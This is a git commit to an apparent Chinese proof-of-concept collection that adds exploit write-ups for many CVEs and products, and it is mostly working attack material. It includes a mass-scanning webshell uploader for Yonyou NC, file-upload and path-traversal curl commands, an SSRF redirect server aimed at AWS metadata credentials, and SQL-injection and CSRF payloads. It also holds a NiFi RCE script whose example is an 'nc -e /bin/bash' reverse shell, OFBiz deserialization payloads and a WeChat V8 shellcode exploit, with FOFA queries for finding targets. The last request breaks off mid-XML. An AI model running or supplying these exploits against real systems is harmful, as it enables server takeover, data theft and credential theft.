更新漏洞

This commit is contained in:
Threekiii 2022-12-05 17:54:08 +08:00
parent cba0c4db58
commit ed6c0342e5
31 changed files with 1488 additions and 89 deletions


@ -0,0 +1,23 @@
# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342
## 漏洞描述
- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
## FOFA
```
"Anchor CMS" && body="themes/default/img/favicon.png"
```
## 漏洞复现
Anchor CMS使用Get方法进行敏感操作可以使用exploit.html进行删除用户等操作。
**exploit.html**
```html
<img src="http://target/anchor/index.php/admin/users/delete/21">
```
当管理员点击时删除ID为21的用户。


@ -0,0 +1,45 @@
# 泛微OA E-cology KtreeUploadAction 任意文件上传
## 漏洞描述
参考链接:
- [泛微e-cology任意文件上传(已修复)](https://mp.weixin.qq.com/s?__biz=MzkxMzIzNTU5Mg==&mid=2247483666&idx=1&sn=e70efe98c064e0f1df986e2b65c1a608&chksm=c1018af5f67603e39ce4d6e9375875e63e7b80633a1f99959f8d4652193ac3734765a99099ea&mpshare=1&scene=23&srcid=0414cqXy50udQOy19LYOMega&sharer_sharetime=1618332600979&sharer_shareid=d15208c7b27f111e2fe465f389ab6fac#rd)
## 影响版本
```
目前已修复
```
## 漏洞复现
定位文件:
`ecology\CLASSB~1\com\weaver\formmodel\apps\ktree\servlet\KtreeUploadAction.class`
exp
```
POST /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: multipart/form-data; boundary=--------1638451160
Content-Length: 171
----------1638451160
Content-Disposition: form-data; name="test"; filename="test.jsp"
Content-Type: image/jpeg
helloword
----------1638451160--
```


@ -1,4 +1,4 @@
# 泛微OA WorkflowServiceXml RCE
# 泛微OA E-cology WorkflowServiceXml RCE
## 漏洞描述


@ -0,0 +1,197 @@
# 用友 NC FileReceiveServlet 反序列化RCE漏洞
## 漏洞描述
用友NC 存在反序列化 RCE漏洞攻击者可利用控制服务器
## 漏洞影响
```
用友NC 6.5
```
## FOFA
```
app="用友-UFIDA-NC"
```
## 漏洞复现
首先从任意文件上传说起
任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到从请求中读取流然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
![yongyou-5-1](./images/yongyou-5-1.png)
而网上很多poc大多都是基于此漏洞利用反序列化上传一个文件到服务器。
这也就是去年的那个任意文件上传的反序列化漏洞。但是但是这个漏洞本质是一个反序列化漏洞。而且某C的classpath中也存在apache commonscollections库我们可以利用这个库直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
**内存马**
老样子在反序列化中想执行任意代码一般都依靠xalan这个库。这次也不例外。
植入内存马关键在于我们怎样找到context只有找到context我们才可以添加filter。好在某c中我们只需要通过下面的代码既可以获取当前context不需要从tomcat中获取context
```java
Object obj = 改动Locator.getInstance().lookup("ServletContext");
Field contextField = obj.getClass().getDeclaredField("context");
contextField.setAccessible(true);
obj = contextField.get(obj);
Field contextField1 = obj.getClass().getDeclaredField("context");
contextField1.setAccessible(true);
addFitlertoTomcat(contextField1.get(obj));
```
剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
![yongyou-5-2](./images/yongyou-5-2.png)
**回显**
我们只需要找到这样一个servlet即存在反序列化的readObject又将错误信息写入到response中
不难看出 uploadServlet 就很满足这个需求。
```plain
out = new ObjectOutputStream(output);
in = new ObjectInputStream(request.getInputStream());
String dsName = (String)in.readObject();
}
} catch (Exception var14) {
var14.printStackTrace();
if (out == null) {
throw new ServletException(var14);
}
out.writeObject(var14);
```
如果出错的话将错误信息通过序列化写入到response中。好处在于我们不需要麻烦的去找tomcat的response对象。
所以我们将反序列化的payload发送给uploadServlet即可。然后我们只需要读取响应即可拿到服务器命令执行的回显结果。客户端代码可以这样写
```java
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
Exception e = (Exception) objectInputStream.readObject();
Object obj = e.getCause();
Field targetF = obj.getClass().getDeclaredField("target");
targetF.setAccessible(true);
obj = targetF.get(obj);
Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
msgF.setAccessible(true);
String msg = msgF.get(obj).toString();
System.out.println(msg);
```
### 文件上传EXP
python exp
```
import requests
import threadpool
import urllib3
import sys
import argparse
urllib3.disable_warnings()
proxies = {'http': 'http://localhost:8080', 'https': 'http://localhost:8080'}
header = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": "https://google.com",
}
def multithreading(funcname, filename="url.txt", pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(funcname, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def wirte_targets(vurl, filename):
with open(filename, "a+") as f:
f.write(vurl + "\n")
return vurl
def exp(u):
uploadHeader = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36",
"Content-Type": "multipart/form-data;",
"Referer": "https://google.com"
}
uploadData = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x02\x74\x00\x09\x46\x49\x4c\x45\x5f\x4e\x41\x4d\x45\x74\x00\x09\x74\x30\x30\x6c\x73\x2e\x6a\x73\x70\x74\x00\x10\x54\x41\x52\x47\x45\x54\x5f\x46\x49\x4c\x45\x5f\x50\x41\x54\x48\x74\x00\x10\x2e\x2f\x77\x65\x62\x61\x70\x70\x73\x2f\x6e\x63\x5f\x77\x65\x62\x78"
shellFlag="t0test0ls"
uploadData+=shellFlag
try:
req1 = requests.post(u + "/servlet/FileReceiveServlet", headers=uploadHeader, verify=False, data=uploadData, timeout=25)
if req1.status_code == 200 :
req3=requests.get(u+"/t00ls.jsp",headers=header, verify=False, timeout=25)
if req3.text.index(shellFlag)>=0:
printFlag = "[Getshell]" + u+"/t00ls.jsp" + "\n"
print (printFlag)
wirte_targets(printFlag, "vuln.txt")
except :
pass
#print(printFlag, end="")
if __name__ == "__main__":
if (len(sys.argv)) < 2:
print('useage : python' +str(sys.argv[0]) + ' -h')
else:
parser =argparse.ArgumentParser()
parser.description ='YONYOU UC 6.5 FILE UPLOAD!'
parser.add_argument('-u',help="url -> example http://127.0.0.1",type=str,dest='check_url')
parser.add_argument('-r',help="url list to file",type=str,dest='check_file')
args =parser.parse_args()
if args.check_url:
exp(args.check_url)
if(args.check_file):
multithreading(exp, args.check_file, 8)
```
java exp
```
import java.io.*;
import java.util.HashMap;
import java.util.Map;
public class App {
public static void main(String[] args) throws Exception {
String url="http://192.168.40.222";
Map<String, Object> metaInfo=new HashMap<String, Object>();
metaInfo.put("TARGET_FILE_PATH","webapps/nc_web");
metaInfo.put("FILE_NAME","cmd.jsp");
ByteArrayOutputStream baos=new ByteArrayOutputStream();
ObjectOutputStream oos=new ObjectOutputStream(baos);
oos.writeObject(metaInfo);
InputStream in=App.class.getResourceAsStream("cmd.jsp");
byte[] buf=new byte[1024];
int len=0;
while ((len=in.read(buf))!=-1){
baos.write(buf,0,len);
}
HttpClient.post(url+"/servlet/FileReceiveServlet",baos.toByteArray());
HttpResult result=HttpClient.get(url+"/cmd.jsp?cmd=echo+aaaaaa");
if(result.getData().contains("aaaaaa")){
System.out.println("shell路径:"+url+"/cmd.jsp?cmd=whoami");
}else{
System.out.println("上传shell失败或者漏洞不存在");
}
}
}
```
## 参考文章
https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w


@ -1,84 +0,0 @@
# 用友 NC 反序列化RCE漏洞
## 漏洞描述
用友NC 存在反序列化 RCE漏洞攻击者可利用控制服务器
## 漏洞影响
```
用友 NC
```
## 漏洞复现
首先从任意文件上传说起
任意文件上传分析代码在`servlet.FileReceiveServlet`。在这里我们可以看到从请求中读取流然后转换为map类型并读取上传文件的路径。然后再读取待上传的文件。
![yongyou-5-1](./images/yongyou-5-1.png)
而网上很多poc大多都是基于此漏洞利用反序列化上传一个文件到服务器。
这也就是去年的那个任意文件上传的反序列化漏洞。但是但是这个漏洞本质是一个反序列化漏洞。而且某C的classpath中也存在apache commonscollections库我们可以利用这个库直接执行命令或者内存马。岂不是比任意文件上传舒服多了。
**内存马**
老样子在反序列化中想执行任意代码一般都依靠xalan这个库。这次也不例外。
植入内存马关键在于我们怎样找到context只有找到context我们才可以添加filter。好在某c中我们只需要通过下面的代码既可以获取当前context不需要从tomcat中获取context
```java
Object obj = 改动Locator.getInstance().lookup("ServletContext");
Field contextField = obj.getClass().getDeclaredField("context");
contextField.setAccessible(true);
obj = contextField.get(obj);
Field contextField1 = obj.getClass().getDeclaredField("context");
contextField1.setAccessible(true);
addFitlertoTomcat(contextField1.get(obj));
```
剩下的就是常规操作,可以看我之前的内存马模型,基本不需要很大的改动即可完美适配。
![yongyou-5-2](./images/yongyou-5-2.png)
**回显**
我们只需要找到这样一个servlet即存在反序列化的readObject又将错误信息写入到response中
不难看出 uploadServlet 就很满足这个需求。
```plain
out = new ObjectOutputStream(output);
in = new ObjectInputStream(request.getInputStream());
String dsName = (String)in.readObject();
}
} catch (Exception var14) {
var14.printStackTrace();
if (out == null) {
throw new ServletException(var14);
}
out.writeObject(var14);
```
如果出错的话将错误信息通过序列化写入到response中。好处在于我们不需要麻烦的去找tomcat的response对象。
所以我们将反序列化的payload发送给uploadServlet即可。然后我们只需要读取响应即可拿到服务器命令执行的回显结果。客户端代码可以这样写
```java
ObjectInputStream objectInputStream = new ObjectInputStream(new ByteArrayInputStream(r));
Exception e = (Exception) objectInputStream.readObject();
Object obj = e.getCause();
Field targetF = obj.getClass().getDeclaredField("target");
targetF.setAccessible(true);
obj = targetF.get(obj);
Field msgF = obj.getClass().getSuperclass().getDeclaredField("detailMessage");
msgF.setAccessible(true);
String msg = msgF.get(obj).toString();
System.out.println(msg);
```
## 参考文章
https://mp.weixin.qq.com/s/IdXYbjNVGVIasuwQH48Q1w


@ -0,0 +1,87 @@
# Adminer SSRF漏洞 CVE-2021-21311
## 漏洞描述
使用管理员发送任意get请求并从内部服务器检索JSON响应的方法。可以从AWS元数据服务中提取AWS访问密钥。
参考链接:
- https://github.com/advisories/GHSA-x5r2-hj5c-8jx6
- https://gist.github.com/bpsizemore/227141941c5075d96a34e375c63ae3bd
## 漏洞复现
首先启动一个python服务器该服务器侦听传入的连接并以301重定向响应到任意选择的主机。在此示例情况下重定向指向AWS元数据服务
```
http://169.254.169.254/latest/meta-data/instance-id
```
然后在Adminer中使用Elasticsearch登录模块“登录”运行python代码的服务器这导致Adminer从包含服务器的AWS实例ID的元数据服务器打印json响应。
![](images/16133787776790.jpg)
重定向请求的python脚本
```py
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
import sys
import argparse
def redirect_handler_factory(url):
"""
Returns a request handler class that redirects to supplied `url`
"""
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
def do_POST(self):
self.send_response(301)
self.send_header('Location', url)
self.end_headers()
return RedirectHandler
def main():
parser = argparse.ArgumentParser(description='HTTP redirect server')
parser.add_argument('--port', '-p', action="store", type=int, default=80, help='port to listen on')
parser.add_argument('--ip', '-i', action="store", default="", help='host interface to listen on')
parser.add_argument('redirect_url', action="store")
myargs = parser.parse_args()
redirect_url = myargs.redirect_url
port = myargs.port
host = myargs.ip
redirectHandler = redirect_handler_factory(redirect_url)
handler = SocketServer.TCPServer((host, port), redirectHandler)
print("serving at port %s" % port)
handler.serve_forever()
if __name__ == "__main__":
main()
```
```
http://169.254.169.254/latest/meta-data/iam/security-credentials/ //列出服务器的可用角色。
```
![](images/16133787994051.jpg)


@ -0,0 +1,43 @@
# Adobe ColdFusion 远程代码执行漏洞 CVE-2021-21087
## 漏洞描述
Adobe ColdFusion是一个快速应用程序开发平台。Adobe ColdFusion 存在远程代码执行漏洞,由于过滤不严,未经授权的攻击者可构造恶意请求,造成任意代码执行,控制服务器。建议相关用户尽快采取安全措施阻止漏洞攻击。
参考链接:
- https://nosec.org/home/detail/4707.html
- https://github.com/projectdiscovery/nuclei-templates/pull/1128/files
- https://helpx.adobe.com/security/products/coldfusion/apsb21-16.html
## 漏洞影响
```
Adobe ColdFusion 2021 <= Version 2021.0.0.323925
Adobe ColdFusion 2018 <= Update 10
Adobe ColdFusion 2016 <= Update 16
```
## FOFA
```
app="Adobe-ColdFusion"
```
## 漏洞复现
```
- method: GET
path:
- "{{BaseURL}}/cf_scripts/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cf-scripts/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/CFIDE/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfide/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/CF_SFSD/scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfide-scripts/ajax/package/cfajax.js"
- "{{BaseURL}}/cfmx/CFIDE/scripts/ajax/package/cfajax.js"
regex:
- 'eval\(\"\(\"\+json\+\"\)\"\)'
```


@ -0,0 +1,25 @@
# Afterlogic Aurora & WebMail Pro 任意文件读取CVE-2021-26294
## 漏洞描述
攻击者可以通过caldav_public_user@localhost用户登录,不需要其它用户信息就可以读取配置文件从而获得敏感信息。
参考链接:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26294
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md
- https://forum.ywhack.com/thread-115326-1-8.html
## 漏洞影响
```
WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9
```
## 漏洞复现
```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```


@ -0,0 +1,33 @@
# Afterlogic Aurora & WebMail Pro 文件上传漏洞 CVE-2021-26293
## 漏洞描述
该漏洞是由于Afterlogic Aurora & WebMail Pro中对上传的文件过滤和限制存在缺陷攻击者可以通过上传恶意文件从而执行任意代码。
参考链接:
- http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26293
- https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26293-rce-via-public-unrestricted-file-upload-vulnerability.md
- https://forum.ywhack.com/thread-115325-1-8.html
## 漏洞影响
```
WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9
```
## 漏洞复现
```bash
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
```
默认路径为/var/www/html也可能更改配置为其它路径可以尝试其它方式获取。
```bash
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
//使用无效路径获取SabreDAV错误查看Webroot路径
```



@ -0,0 +1,49 @@
# 员工管理系统 Employee Management System 1.0 身份验证绕过
## 漏洞描述
漏洞发现时间2020-10-16
软件下载地址https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip
验证环境Windows 10 + xampp v3.2.4
参考链接:
- https://www.exploit-db.com/exploits/48882
## 漏洞复现
打开网址:
```
http://localhost:8081/Employee%20Management%20System/alogin.html
```
通过payload绕过验证
```
anki' or 1=1#
```
发送请求:
```
POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Origin: http://localhost:8081
Connection: close
Referer: http://localhost:8081/Employee%20Management%20System/alogin.html
Cookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv
Upgrade-Insecure-Requests: 1
mailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login
```
将以Admin身份登录应用


@ -0,0 +1,21 @@
# 金山 V8 V9 终端安全系统 文件上传漏洞
## 漏洞描述
参考链接:
- https://forum.butian.net/share/76
## 漏洞复现
在tools目录下的mange下存在一个upload.php。该文件可导致任意文件上传。
poc
```
POST /tools/manage/upload.php HTTP/1.1
HOST: target
...
<?php phpinfo(); ?>
```


@ -0,0 +1,22 @@
# 阿里巴巴otter manager分布式数据库同步系统信息泄漏 CNVD-2021-16592
## 漏洞描述
阿里巴巴otter manager分布式数据库同步系统是基于数据库增量日志解析准实时同步到本机房或异地机房的mysql/oracle数据库一个分布式数据库同步系统。阿里巴巴otter manager分布式数据库同步系统存在信息泄露漏洞攻击者可利用漏洞获取zookper信息。
参考链接:
* https://www.cnvd.org.cn/flaw/show/CNVD-2021-16592
* https://forum.ywhack.com/thread-115309-1-8.html
## FOFA
```
title="Otter Manager"
```
## 漏洞复现
默认口令:`admin/admin`
进入后直接f12查看元素修改password为text即可查看数据库等敏感信息密码。


@ -4,7 +4,15 @@
Apache Druid 是用Java编写的面向列的开源分布式数据存储旨在快速获取大量事件数据并在数据之上提供低延迟查询。
Apache Druid 默认情况下缺乏授权认证攻击者可以发送特制请求利用Druid服务器上进程的特权执行任意代码。
Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中默认已被禁用。但是在Druid 0.20.0及更低版本中经过身份验证的用户发送恶意请求利用Apache Druid漏洞可以执行任意代码
Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中默认已被禁用。但是在Druid 0.20.0及更低版本中经过身份验证的用户发送恶意请求利用Apache Druid漏洞可以执行任意代码。
参考链接:
* https://github.com/apache/druid/issues/2434
* https://forum.ywhack.com/thread-115083-1-1.html
* https://druid.apache.org/docs/latest/operations/api-reference.html#broker
* https://lists.apache.org/thread.html/r20e0c3b10ae2c05a3aad40f1476713c45bdefc32c920b9986b941d8f@%3Cannounce.apache.org%3E
* https://www.o2oxy.cn/3090.html
## 漏洞影响


@ -0,0 +1,29 @@
# Apache Druid 远程代码执行漏洞 CVE-2021-26919
## 漏洞描述
Apache Druid 是用Java编写的面向列的开源分布式数据存储旨在快速获取大量事件数据并在数据之上提供低延迟查询。2021年3月30日Apache Druid官方发布安全更新修复了 CVE-2021-26919 Apache Druid 远程代码执行漏洞。由于Apache Druid 默认情况下缺乏授权认证,攻击者可直接构造恶意请求执行任意代码,控制服务器。
参考链接:
* http://m0d9.me/2021/04/21/Apache-Druid-CVE-2021-26919-%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/
* https://help.aliyun.com/noticelist/articleid/1060822985.html
## 漏洞影响
```
Apache Druid < 0.20.2
```
## 漏洞复现
jdbc触发点https://druid.apache.org/docs/0.19.0/development/extensions-core/druid-lookups.html#polling-lookup
poc:
```
url = "jdbc:mysql://localhost:3307/?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&maxAllowedPacket=65535"
user ="cb1"
password="password"
```


@ -0,0 +1,126 @@
# Apache NiFi Api 远程代码执行 RCE
## 漏洞描述
Apache NiFi是Apache Software Foundation的一个软件项目旨在使软件系统之间的数据流自动化。
参考链接:
- https://twitter.com/chybeta/status/1333341820596568065
- https://github.com/imjdl/Apache-NiFi-Api-RCE
- https://forum.ywhack.com/thread-114763-1-3.html
## FOFA
```
"nifi" && title=="NiFi"
```
## 漏洞复现
exp
```python
import sys
import json
import requests as req
class Exp:
def __init__(self, url):
self.url = url
def check_is_vul(self):
url = self.url + "/nifi-api/access/config"
try:
res = req.get(url=url, verify=False)
data = res.json()
return not data["config"]["supportsLogin"]
except Exception as e:
pass
return False
def clean_up(self, p_id):
url = self.url + "/nifi-api/processors/" + p_id + "/run-status"
data = {'revision': {'clientId': 'x', 'version': 1}, 'state': 'STOPPED'}
req.put(url=url, data=json.dumps(data), verify=False)
req.delete(url + "/threads", verify=False)
def exploit(self, cmd):
g_id = self.fetch_process_group()
if g_id:
p_id = self.create_process(g_id)
if p_id:
self.run_cmd(p_id=p_id, cmd=cmd)
self.clean_up(p_id=p_id)
def run_cmd(self, p_id, cmd):
url = self.url + "/nifi-api/processors/" + p_id
cmd = cmd.split(" ")
data = {
'component': {
'config': {
'autoTerminatedRelationships': ['success'],
'properties': {
'Command': cmd[0],
'Command Arguments': " ".join(cmd[1:]),
},
'schedulingPeriod': '3600 sec'
},
'id': p_id,
'state': 'RUNNING'
},
'revision': {'clientId': 'x', 'version': 1}
}
print(data)
headers = {
"Content-Type": "application/json",
}
res = req.put(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()
def fetch_process_group(self):
url = self.url + "/nifi-api/process-groups/root"
try:
res = req.get(url=url, verify=False)
data = res.json()["id"]
return data
except Exception as e:
pass
return 0
def create_process(self, process_group_id):
url = self.url + "/nifi-api/process-groups/" + process_group_id + "/processors"
data = {
'component': {
'type': 'org.apache.nifi.processors.standard.ExecuteProcess'
},
'revision': {
'version': 0
}
}
headers = {
"Content-Type": "application/json",
}
try:
res = req.post(url=url, data=json.dumps(data), headers=headers, verify=False)
return res.json()["id"]
except Exception as e:
pass
return 0
if __name__ == '__main__':
if len(sys.argv) != 3:
print("rce.py url cmd")
else:
url = sys.argv[1] # http://192.168.1.1:8080
cmd = sys.argv[2] # nc -e /bin/bash 192.168.1.129 1234
e = Exp(url)
e.exploit(cmd)
```
msf模块
https://packetstormsecurity.com/files/160260/apache_nifi_processor_rce.rb.txt


@ -0,0 +1,51 @@
# Apache OFBiz RMI Bypass RCE CVE-2021-29200
## 漏洞描述
由于Apache OFBiz存在Java RMI反序列化漏洞未经身份验证的用户可以执行RCE攻击导致服务器被接管。
参考链接:
- https://mp.weixin.qq.com/s/vM0pXZ5mhusFBsj1xD-2zw
- https://xz.aliyun.com/t/9556
## 漏洞影响
```
Apache OFBiz < 17.12.07
```
## 漏洞复现
poc
```
POST /webtools/control/SOAPService HTTP/1.1
Host: xxx
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 877
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
<map-Key>
<cus-obj>ACED0005737200326A617661782E6D616E6167656D656E742E72656D6F74652E726D692E524D49436F6E6E656374696F6E496D706C5F5374756200000000000000020200007872001A6A6176612E726D692E7365727665722E52656D6F746553747562ECC98BE1651A0200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707738000A556E6963617374526566000F3130342E3135362E3233312E3135300000270FFFFFFFFFEF34D1DB00000000000000000000000000000078</cus-obj>
</map-Key>
<map-Value>
<std-String/>
</map-Value>
</map-Entry>
</map-Map>
</ser>
</soapenv:Body>
</soapenv:Envelope>
```


@ -0,0 +1,196 @@
# 微信客户端 远程命令执行漏洞
## 漏洞描述
微信客户端存在远程命令执行漏洞。目前已经发现在野利用受害者点击链接就会中招微信Windows PC版进程webchatweb.exe会加载shellcode执行整个过程无文件落地无新进程产生攻击者可以直接获取目标机器权限。
参考链接:
- https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ
## 漏洞影响
```
微信Windows版 <=3.2.1.141 截止2022年12月最新版为3.8.0.41
```
## 漏洞复现
[安恒信息应急响应中心](https://mp.weixin.qq.com/s/OfPNr-l_9kzl1MdE7DSHHQ)分析的攻击链:
1. 攻击者利用微信PC版0day构造恶意的钓鱼链接通过微信将钓鱼链接发送给目标员工。
2. 当员工打开攻击者的钓鱼链接时触发该漏洞从而导致目标员工PC被植入攻击者制作的cobalstrike木马木马进程为xxxsoft.exe同时创建了名为dotnet_v4.3的系统服务。
3. 随后攻击者进一步在c:\\ProgramData\目录下放置TxPortMap.exe 扫描工具并利用该工具扫描目标单位内网。
exploit.js
```
ENABLE_LOG = true;
IN_WORKER = true;
// run calc and hang in a loop
var shellcode = [#shellcode];//shellcode替换成自己的 注意是x86的
function print(data) {
}
var not_optimised_out = 0;
var target_function = (function (value) {
if (value == 0xdecaf0) {
not_optimised_out += 1;
}
not_optimised_out += 1;
not_optimised_out |= 0xff;
not_optimised_out *= 12;
});
for (var i = 0; i < 0x10000; ++i) {
target_function(i);
}
var g_array;
var tDerivedNCount = 17 * 87481 - 8;
var tDerivedNDepth = 19 * 19;
function cb(flag) {
if (flag == true) {
return;
}
g_array = new Array(0);
g_array[0] = 0x1dbabe * 2;
return 'c01db33f';
}
function gc() {
for (var i = 0; i < 0x10000; ++i) {
new String();
}
}
function oobAccess() {
var this_ = this;
this.buffer = null;
this.buffer_view = null;
this.page_buffer = null;
this.page_view = null;
this.prevent_opt = [];
var kSlotOffset = 0x1f;
var kBackingStoreOffset = 0xf;
class LeakArrayBuffer extends ArrayBuffer {
constructor() {
super(0x1000);
this.slot = this;
}
}
this.page_buffer = new LeakArrayBuffer();
this.page_view = new DataView(this.page_buffer);
new RegExp({ toString: function () { return 'a' } });
cb(true);
class DerivedBase extends RegExp {
constructor() {
// var array = null;
super(
// at this point, the 4-byte allocation for the JSRegExp `this` object
// has just happened.
{
toString: cb
}, 'g'
// now the runtime JSRegExp constructor is called, corrupting the
// JSArray.
);
// this allocation will now directly follow the FixedArray allocation
// made for `this.data`, which is where `array.elements` points to.
this_.buffer = new ArrayBuffer(0x80);
g_array[8] = this_.page_buffer;
}
}
// try{
var derived_n = eval(`(function derived_n(i) {
if (i == 0) {
return DerivedBase;
}
class DerivedN extends derived_n(i-1) {
constructor() {
super();
return;
${"this.a=0;".repeat(tDerivedNCount)}
}
}
return DerivedN;
})`);
gc();
new (derived_n(tDerivedNDepth))();
this.buffer_view = new DataView(this.buffer);
this.leakPtr = function (obj) {
this.page_buffer.slot = obj;
return this.buffer_view.getUint32(kSlotOffset, true, ...this.prevent_opt);
}
this.setPtr = function (addr) {
this.buffer_view.setUint32(kBackingStoreOffset, addr, true, ...this.prevent_opt);
}
this.read32 = function (addr) {
this.setPtr(addr);
return this.page_view.getUint32(0, true, ...this.prevent_opt);
}
this.write32 = function (addr, value) {
this.setPtr(addr);
this.page_view.setUint32(0, value, true, ...this.prevent_opt);
}
this.write8 = function (addr, value) {
this.setPtr(addr);
this.page_view.setUint8(0, value, ...this.prevent_opt);
}
this.setBytes = function (addr, content) {
for (var i = 0; i < content.length; i++) {
this.write8(addr + i, content[i]);
}
}
return this;
}
function trigger() {
var oob = oobAccess();
var func_ptr = oob.leakPtr(target_function);
print('[*] target_function at 0x' + func_ptr.toString(16));
var kCodeInsOffset = 0x1b;
var code_addr = oob.read32(func_ptr + kCodeInsOffset);
print('[*] code_addr at 0x' + code_addr.toString(16));
oob.setBytes(code_addr, shellcode);
target_function(0);
}
try{
print("start running");
trigger();
}catch(e){
print(e);
}
```


@ -0,0 +1,158 @@
# Apache OFBiz 反序列化 CVE-2021-30128
## 漏洞描述
OfbizOpen for business是一个开源的基于J2EE和XML规范的用于构建大型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架Framework
参考链接:
- 阿里云分析https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w
- r0ckyhttps://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
- https://github.com/r0ckysec/CVE-2021-30128
- https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
## 漏洞影响
```
Apache OFBiz < 17.12.07
```
## FOFA
```
app="Apache_OFBiz"
```
## 漏洞复现
poc
```
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.80.145:8443
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 6093
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-Map>
<map-Entry>
